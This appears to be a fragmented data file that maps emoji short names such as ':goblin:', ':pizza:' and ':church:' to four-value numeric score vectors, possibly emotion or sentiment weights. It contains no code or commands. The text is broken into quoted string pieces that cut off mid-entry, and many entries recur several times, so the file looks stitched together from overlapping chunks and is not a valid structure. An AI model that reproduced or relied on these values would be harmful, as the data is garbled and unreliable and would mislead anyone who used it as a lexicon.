[0.237, 0.215, 0.266,", "0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281],", "0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228,", "0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153],", "[0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128,", "0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\":", "\":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109,", "0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177],", "0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264],", "0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001,", "\":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322,", "0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\":", "[0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502,", "0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\":", "[0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005,", "\":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302,", "0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\":", "\":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125,", "\":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293,", "[0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126,", "[0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266,", "0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\":", "[0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152,", "[0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004,", "0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121],", "0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\":", "0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214],", "0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179],", "\":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149,", "[0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125,", "0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\":", "0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433],", "0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239],", "0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\":", "0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\":", "[0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996,", "0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\":", "\":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154,", "0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1],", "[0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155,", "0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002,", "[0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371,", "0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\":", "0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245],", "0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16,", "0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226],", "0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\":", "0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\":", "0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002,", "[0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254,", "[0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266,", "\":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16,", "0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\":", "0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\":", "0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071],", "0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\":", "\":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285,", "[0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287,", "0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129,", "0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185],", "0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255,", "[0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149,", "\":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293,", "0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\":", "\":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184,", "0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162,", "[0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209,", "[0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158,", "[0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126,", "0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138],", "[0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14,", "0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\":", "[0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405,", "0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155,", "0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001,", "0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258],", "\":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998,", "0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205,", "\":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298,", "0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185,", "0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126,", "\":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172,", "0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198,", "\":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999,", "0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237,", "[0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003,", "0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359],", "\":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191,", "[0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331,", "0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129],", "0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142],", "0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\":", "\":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002,", "0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\":", "\":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998,", "\":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184,", "0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\":", "0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\":", "0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212],", "0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128,", "[0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305,", "0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996],", "0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149,", "[0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266,", "\":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268,", "0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\":", "0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142],", "0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163],", "0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998],", "0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23,", "\":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27,", "\":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341,", "0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002],", "0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18],", "\":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997,", "0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107,", "0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243],", "\":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213,", "[0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085,", "0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\":", "0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\":", "[0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177,", "\":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084,", "0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\":", "0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\":", "[0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004,", "0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256],", "0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\":", "0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\":", "\":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27,", "0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\":", "0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\":", "\":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078,", "0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348,", "0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005],", "0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264],", "0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\":", "[0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166,", "0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\":", "0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997],", "\":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002,", "0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085,", "0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\":", "\":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485,", "\":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122,", "0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271,", "0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\":", "0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002],", "0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34,", "0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243],", "\":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124,", "[0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298,", "0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35,", "[0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284,", "0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998,", "0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002,", "0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\":", "\":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237,", "0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\":", "\":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297,", "0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266,", "0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 